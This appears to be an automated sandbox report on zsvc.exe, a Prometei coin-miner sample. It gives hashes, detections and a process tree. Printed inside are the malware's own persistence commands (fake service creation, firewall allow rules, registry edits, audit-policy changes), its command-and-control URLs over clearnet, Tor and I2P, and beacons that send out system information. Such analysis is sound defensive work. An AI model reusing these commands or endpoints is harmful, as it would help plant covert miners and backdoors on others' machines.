Play interactive tour

Edit tour

Analysis Report zsvc.exe

Overview

General Information

Sample Name:	zsvc.exe
Analysis ID:	373955
MD5:	84452e3633c40030e72c9375c8a3cacb
SHA1:	fe65853ff86e5783c3d70edcbe0771447967ab0c
SHA256:	f0a5b257f16c4ccff520365ebc143f09ccf233e642bf540b5b90a2bbdb43d5b4
Infos:
Most interesting Screenshot:

Detection

CoinMiner Prometei

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected CoinMiner

Yara detected Prometei

Creates files in the system32 config directory

Found Tor onion address

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies the windows firewall

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses netsh to modify the Windows network and firewall settings

Contains capabilities to detect virtual machines

Contains functionality to dynamically determine API calls

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates or modifies windows services

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Netsh Port or Application Allowed

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

System is w10x64

svchost.exe (PID: 1720 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

zsvc.exe (PID: 4088 cmdline: 'C:\Users\user\Desktop\zsvc.exe' MD5: 84452E3633C40030E72C9375C8A3CACB)

cmd.exe (PID: 5476 cmdline: 'C:\Windows\System32\cmd.exe' /C copy /y 'c:\users\user\desktop\zsvc.exe' C:\windows MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5932 cmdline: cmd.exe /c sc query UPlugPlay MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 5076 cmdline: sc query UPlugPlay MD5: D79784553A9410D15E04766AAAB77CD6)

cmd.exe (PID: 5800 cmdline: 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes&netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 3704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

netsh.exe (PID: 3164 cmdline: netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes MD5: 98CC37BBF363A38834253E22C80A8F32)

netsh.exe (PID: 5076 cmdline: netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE MD5: 98CC37BBF363A38834253E22C80A8F32)

cmd.exe (PID: 5552 cmdline: 'C:\Windows\System32\cmd.exe' /C sc delete UPlugPlay&sc create UPlugPlay binPath= 'c:\windows\sqhost.exe Dcomsvc' type= own DisplayName= 'UPlug-and-Play Host' start= auto error= ignore MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 1748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 6024 cmdline: sc delete UPlugPlay MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 6152 cmdline: sc create UPlugPlay binPath= 'c:\windows\sqhost.exe Dcomsvc' type= own DisplayName= 'UPlug-and-Play Host' start= auto error= ignore MD5: D79784553A9410D15E04766AAAB77CD6)

cmd.exe (PID: 3260 cmdline: 'C:\Windows\System32\cmd.exe' /C reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay' /v ImagePath /f /t REG_EXPAND_SZ /d 'c:\windows\sqhost.exe Dcomsvc' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

reg.exe (PID: 5452 cmdline: reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay' /v ImagePath /f /t REG_EXPAND_SZ /d 'c:\windows\sqhost.exe Dcomsvc' MD5: E3DACF0B31841FA02064B4457D44B357)

cmd.exe (PID: 4424 cmdline: 'C:\Windows\System32\cmd.exe' /C sc config UPlugPlay start= auto MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 5988 cmdline: sc config UPlugPlay start= auto MD5: D79784553A9410D15E04766AAAB77CD6)

cmd.exe (PID: 6080 cmdline: 'C:\Windows\System32\cmd.exe' /C ren C:\windows\zsvc.exe sqhost.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6236 cmdline: 'C:\Windows\System32\cmd.exe' cmd.exe /C sc start UPlugPlay MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 6280 cmdline: sc start UPlugPlay MD5: D79784553A9410D15E04766AAAB77CD6)

cmd.exe (PID: 6288 cmdline: 'C:\Windows\System32\cmd.exe' cmd.exe /C sc start UPlugPlay MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 6376 cmdline: sc start UPlugPlay MD5: D79784553A9410D15E04766AAAB77CD6)

sqhost.exe (PID: 6304 cmdline: c:\windows\sqhost.exe Dcomsvc MD5: 84452E3633C40030E72C9375C8A3CACB)

sqhost.exe (PID: 6344 cmdline: c:\windows\sqhost.exe -watchdog MD5: 84452E3633C40030E72C9375C8A3CACB)

cmd.exe (PID: 6424 cmdline: 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall delete rule name='Banned brute IPs' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

netsh.exe (PID: 6496 cmdline: netsh advfirewall firewall delete rule name='Banned brute IPs' MD5: 98CC37BBF363A38834253E22C80A8F32)

cmd.exe (PID: 6440 cmdline: 'C:\Windows\System32\cmd.exe' /C Auditpol /set /subcategory:'Logon' /failure:enable MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

auditpol.exe (PID: 6528 cmdline: Auditpol /set /subcategory:'Logon' /failure:enable MD5: 6AA4D93CA898F6906B065323E2F0839A)

WMIC.exe (PID: 6780 cmdline: wmic baseboard get product MD5: EC80E603E0090B3AC3C1234C2BA43A0F)

conhost.exe (PID: 6824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WMIC.exe (PID: 6912 cmdline: wmic baseboard get product MD5: EC80E603E0090B3AC3C1234C2BA43A0F)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp	JoeSecurity_CoinMiner	Yara detected CoinMiner	Joe Security
00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp	JoeSecurity_Prometei	Yara detected Prometei	Joe Security
0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp	JoeSecurity_CoinMiner	Yara detected CoinMiner	Joe Security
0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp	JoeSecurity_Prometei	Yara detected Prometei	Joe Security
0000001B.00000002.469257995.0000000140001000.00000040.00020000.sdmp	JoeSecurity_CoinMiner	Yara detected CoinMiner	Joe Security
0000001B.00000002.469257995.0000000140001000.00000040.00020000.sdmp	JoeSecurity_Prometei	Yara detected Prometei	Joe Security
Process Memory Space: sqhost.exe PID: 6344	JoeSecurity_CoinMiner	Yara detected CoinMiner	Joe Security
Process Memory Space: sqhost.exe PID: 6344	JoeSecurity_Prometei	Yara detected Prometei	Joe Security
Click to see the 3 entries

Sigma Overview

System Summary:

Sigma detected: Netsh Port or Application Allowed

Show sources

Source: Process started

Author: Markus Neis, Sander Wiebing: Data: Command: 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes&netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE, CommandLine: 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes&netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Users\user\Desktop\zsvc.exe' , ParentImage: C:\Users\user\Desktop\zsvc.exe, ParentProcessId: 4088, ProcessCommandLine: 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes&netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE, ProcessId: 5800

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for domain / URL

Show sources

Source: p1.feefreepool.net

Virustotal: Detection: 9%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Windows\zsvc.exe

ReversingLabs: Detection: 68%

Multi AV Scanner detection for submitted file

Show sources

Source: zsvc.exe	Virustotal: Detection: 70%			Perma Link
Source: zsvc.exe	ReversingLabs: Detection: 68%

Machine Learning detection for dropped file

Show sources

Source: C:\Windows\zsvc.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: zsvc.exe

Joe Sandbox ML: detected

Bitcoin Miner:

Yara detected CoinMiner

Show sources

Source: Yara match	File source: 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.469257995.0000000140001000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sqhost.exe PID: 6344, type: MEMORY

Yara detected Prometei

Show sources

Source: Yara match	File source: 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.469257995.0000000140001000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sqhost.exe PID: 6344, type: MEMORY

Networking:

Found Tor onion address

Show sources

Source: zsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp	String found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
Source: zsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp	String found in binary or memory: IpAddress<>C:\Windows\temp\brute_inhibitor.dat&netsh advfirewall firewall add rule name="Banned brute IPs" dir=in interface=any action=block remoteip=/C netsh advfirewall firewall delete rule name="Banned brute IPs"&netsh advfirewall firewall add rule name="Banned brute IPs" dir=in interface=any action=block localip=SeDebugPrivilegeNONE_MAPPED\%d %sNT AUTHORITY\SYSTEM %s\*...%s\%s{"i":"execver?r=&i=&ver=touchtop&answ=sysinfo?add=&h=&enckey=call-watchdog/C netsh advfirewall firewall delete rule name="Banned brute IPs"/C Auditpol /set /subcategory:"Logon" /failure:enableSecurityEvent/System[EventID=4625]CommTimeoutCommModehttp://p1.feefreepool.net/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgiUseVendorUrl0SOFTWARE\Intel\SupporthttpUseVendorUrl1Autoexec1Autoexec2taskkill_pathsearchNOT FOUNDchkport:extip&extip=enc01updatewbset_timeoutset_cc0set_cc1set_autoexec1set_autoexec2touch_internaltouch_stopwgetxwgetstop_miningstart_miningstart_mining1quitquit2OK - valid code
Source: sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp	String found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
Source: sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp	String found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgipi.dllD
Source: sqhost.exe, 0000001B.00000002.469257995.0000000140001000.00000040.00020000.sdmp	String found in binary or memory: IpAddress<>C:\Windows\temp\brute_inhibitor.dat&netsh advfirewall firewall add rule name="Banned brute IPs" dir=in interface=any action=block remoteip=/C netsh advfirewall firewall delete rule name="Banned brute IPs"&netsh advfirewall firewall add rule name="Banned brute IPs" dir=in interface=any action=block localip=SeDebugPrivilegeNONE_MAPPED\%d %sNT AUTHORITY\SYSTEM %s\*...%s\%s{"i":"execver?r=&i=&ver=touchtop&answ=sysinfo?add=&h=&enckey=call-watchdog/C netsh advfirewall firewall delete rule name="Banned brute IPs"/C Auditpol /set /subcategory:"Logon" /failure:enableSecurityEvent/System[EventID=4625]CommTimeoutCommModehttp://p1.feefreepool.net/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgiUseVendorUrl0SOFTWARE\Intel\SupporthttpUseVendorUrl1Autoexec1Autoexec2taskkill_pathsearchNOT FOUNDchkport:extip&extip=enc01updatewbset_timeoutset_cc0set_cc1set_autoexec1set_autoexec2touch_internaltouch_stopwgetxwgetstop_miningstart_miningstart_mining1quitquit2OK - valid code
Source: sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp	String found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
Source: sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp	String found in binary or memory: IpAddress<>C:\Windows\temp\brute_inhibitor.dat&netsh advfirewall firewall add rule name="Banned brute IPs" dir=in interface=any action=block remoteip=/C netsh advfirewall firewall delete rule name="Banned brute IPs"&netsh advfirewall firewall add rule name="Banned brute IPs" dir=in interface=any action=block localip=SeDebugPrivilegeNONE_MAPPED\%d %sNT AUTHORITY\SYSTEM %s\*...%s\%s{"i":"execver?r=&i=&ver=touchtop&answ=sysinfo?add=&h=&enckey=call-watchdog/C netsh advfirewall firewall delete rule name="Banned brute IPs"/C Auditpol /set /subcategory:"Logon" /failure:enableSecurityEvent/System[EventID=4625]CommTimeoutCommModehttp://p1.feefreepool.net/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgiUseVendorUrl0SOFTWARE\Intel\SupporthttpUseVendorUrl1Autoexec1Autoexec2taskkill_pathsearchNOT FOUNDchkport:extip&extip=enc01updatewbset_timeoutset_cc0set_cc1set_autoexec1set_autoexec2touch_internaltouch_stopwgetxwgetstop_miningstart_miningstart_mining1quitquit2OK - valid code

Source: global traffic	HTTP traffic detected: GET /cgi-bin/prometei.cgi?r=-1224&i=90Z405GXDA2Q5271 HTTP/1.0Host: p1.feefreepool.net
Source: global traffic	HTTP traffic detected: GET /cgi-bin/prometei.cgi?add=aW5mbyB7DQp2Mi43M0NfQU1ENjQNCjc2MDYzOQ0KDQo0eCBJbnRlbChSKSBDb3JlKFRNKTIgQ1BVIDY2MDAgQCAyLjQwIEdIeg0KDQoNClNGMURFUzlLQVMNCk5TT3V3IE9mDQoNCjEwLjAuMTcxMzQuMQ0KDQoNCjIwMjAwOTMwMDgwMjI5LjQ5MzE3Ny00MjANCk1pY3Jvc29mdCBXaW5kb3dzIDEwIFBybw0KfQ0K&h=computer&i=90Z405GXDA2Q5271&enckey=BtO0tzJv2apOB7qyzIW7zWStGW/UHBc4Xxf1Kg/hg-0ejQgNvvOI-nwRaXMjLhcvacc8U4MXZ7rGYP3FggtsNhWMcIqYeNGD/JknHi-IV66WOa6UuMMRKvZg2a3fLLQAOxVELNFmUML3ZKJUE7iUbF/IJ7fzTHFAPCETqP4WJyQ_ HTTP/1.0Host: p1.feefreepool.net

Source: Joe Sandbox View

IP Address: 88.198.246.242 88.198.246.242

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: global traffic	HTTP traffic detected: GET /cgi-bin/prometei.cgi?r=-1224&i=90Z405GXDA2Q5271 HTTP/1.0Host: p1.feefreepool.net
Source: global traffic	HTTP traffic detected: GET /cgi-bin/prometei.cgi?add=aW5mbyB7DQp2Mi43M0NfQU1ENjQNCjc2MDYzOQ0KDQo0eCBJbnRlbChSKSBDb3JlKFRNKTIgQ1BVIDY2MDAgQCAyLjQwIEdIeg0KDQoNClNGMURFUzlLQVMNCk5TT3V3IE9mDQoNCjEwLjAuMTcxMzQuMQ0KDQoNCjIwMjAwOTMwMDgwMjI5LjQ5MzE3Ny00MjANCk1pY3Jvc29mdCBXaW5kb3dzIDEwIFBybw0KfQ0K&h=computer&i=90Z405GXDA2Q5271&enckey=BtO0tzJv2apOB7qyzIW7zWStGW/UHBc4Xxf1Kg/hg-0ejQgNvvOI-nwRaXMjLhcvacc8U4MXZ7rGYP3FggtsNhWMcIqYeNGD/JknHi-IV66WOa6UuMMRKvZg2a3fLLQAOxVELNFmUML3ZKJUE7iUbF/IJ7fzTHFAPCETqP4WJyQ_ HTTP/1.0Host: p1.feefreepool.net

Source: unknown

DNS traffic detected: queries for: p1.feefreepool.net

Source: zsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp, sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp	String found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi
Source: sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp	String found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgiW
Source: zsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp, sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp	String found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgi
Source: sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp	String found in binary or memory: http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.zero/cgi-bin/prometei.cgifier
Source: zsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp, sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp	String found in binary or memory: http://p1.feefreepool.net/cgi-bin/prometei.cgi
Source: sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp	String found in binary or memory: http://p1.feefreepool.net/cgi-bin/prometei.cgi?add=aW5mbyB7DQp2Mi43M0NfQU1ENjQNCjc2MDYzOQ0KDQo0eCBJb
Source: sqhost.exe, 0000001B.00000002.468366246.000000000056B000.00000004.00000020.sdmp	String found in binary or memory: http://p1.feefreepool.net/cgi-bin/prometei.cgi?r=-1224&i=90Z405GXDA2Q5271
Source: sqhost.exe, 0000001B.00000002.468366246.000000000056B000.00000004.00000020.sdmp	String found in binary or memory: http://p1.feefreepool.net/cgi-bin/prometei.cgi?r=-1224&i=90Z405GXDA2Q52710003
Source: sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp	String found in binary or memory: http://p1.feefreepool.net/cgi-bin/prometei.cgiexe
Source: zsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001B.00000002.469257995.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp	String found in binary or memory: http://p1.feefreepool.net/cgi-bin/prometei.cgihttp://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpj
Source: zsvc.exe, 00000001.00000002.222417885.0000000140001000.00000040.00020000.sdmp, sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp, sqhost.exe, 0000001D.00000002.468355571.0000000140001000.00000040.00020000.sdmp	String found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi
Source: sqhost.exe, 0000001B.00000002.468453524.00000000005F1000.00000004.00000020.sdmp	String found in binary or memory: https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgipi.dllD

Source: C:\Users\user\Desktop\zsvc.exe

File created: C:\Windows\dell

Jump to behavior

Source: C:\Windows\System32\auditpol.exe

Process token adjusted: Security

Jump to behavior

Source: zsvc.exe, 00000001.00000002.222640909.000000014128E000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenamesqhost.exe6 vs zsvc.exe
Source: zsvc.exe, 00000001.00000002.221716042.00000000008F0000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs zsvc.exe
Source: zsvc.exe, 00000001.00000002.221760215.0000000000940000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs zsvc.exe
Source: zsvc.exe, 00000001.00000002.221760215.0000000000940000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs zsvc.exe
Source: zsvc.exe	Binary or memory string: OriginalFilenamesqhost.exe6 vs zsvc.exe

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay' /v ImagePath /f /t REG_EXPAND_SZ /d 'c:\windows\sqhost.exe Dcomsvc'

Source: classification engine

Classification label: mal100.troj.evad.mine.winEXE@69/5@2/1

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6024:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6456:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1748:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6248:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5452:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3704:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6824:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6088:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6192:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6312:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6432:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5912:120:WilError_01

Source: C:\Users\user\Desktop\zsvc.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\zsvc.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\sqhost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\sqhost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\sqhost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: zsvc.exe	Virustotal: Detection: 70%
Source: zsvc.exe	ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Users\user\Desktop\zsvc.exe 'C:\Users\user\Desktop\zsvc.exe'
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C copy /y 'c:\users\user\desktop\zsvc.exe' C:\windows
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c sc query UPlugPlay
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query UPlugPlay
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes&netsh firewall add allowedprogram c:\windows\sqhost.exe 'Secure Socket Tunneling Protocol (HTTP)' ENABLE
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C sc delete UPlugPlay&sc create UPlugPlay binPath= 'c:\windows\sqhost.exe Dcomsvc' type= own DisplayName= 'UPlug-and-Play Host' start= auto error= ignore
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C reg add 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPlugPlay' /v ImagePath /f /t REG_EXPAND_SZ /d 'c:\windows\sqhost.exe Dcomsvc'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='Secure Socket Tunneling Protocol (HTTP)' dir=in action=allow program='c:\windows\sqhost.exe' enable=yes
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\zsvc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C sc config UPlugPlay start= auto
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete UPlugPlay
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
